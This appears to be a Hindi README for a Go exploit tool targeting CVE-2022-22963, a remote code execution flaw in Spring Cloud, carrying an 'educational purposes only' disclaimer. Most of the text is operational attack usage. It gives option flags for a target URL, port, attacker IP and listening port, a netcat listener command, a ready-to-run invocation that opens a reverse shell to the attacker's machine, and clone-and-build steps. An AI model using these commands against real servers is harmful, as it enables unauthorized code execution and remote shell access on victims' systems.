
CVE-2022-22963 के लिए बाइनरी
CVE-2022-22963 का उपयोग करके स्प्रिंग क्लाउड सेवा पर हमला करने वाला रिमोट कोड निष्पादन।
अस्वीकरण: यह केवल शैक्षिक उद्देश्यों के लिए है। लेखक इस प्रोग्राम के उपयोग के लिए जिम्मेदार नहीं है। अपने स्वयं के जोखिम पर उपयोग करें।
./CVE-2022-22963 -h
Usage:
CVE-2022-22963 [OPTIONS]
Application Options:
-u, --target-url= Target/Host url where 'Spring Cloud' is running. Example: -t http://somesite.htb
-p, --target-port= Port running the service. Example: -p 8080
-i, --attacker-ip= Attacker IPv4 Address. Example: -i 10.10.10.10
-l, --listening-port= Listening port to connect. Example: -l 1337
Help Options:
-h, --help Show this help message
मान लें कि एक संभावित कमजोर लक्ष्य http://somerandomserver.com:8080 पर चल रहा है। पोर्ट 1337 पर सुनने के लिए nc शुरू करें, इसलिए हम nc -lvnp 1337 चलाते हैं। फिर, स्क्रिप्ट/एक्सप्लॉइट चलाएं:
./CVE-2022-22963 -u http://somerandomserver.com -p 8080 -i 10.10.10.10 -l 1337
यदि आपकी मशीन में go स्थापित है, तो बस यह करें:
git clone https://github.com/GunZF0x/CVE-2022-22963.git
cd CVE-2022-22963
go run main.go -h #run without compiling any file
go build -o exploit main.go #build the file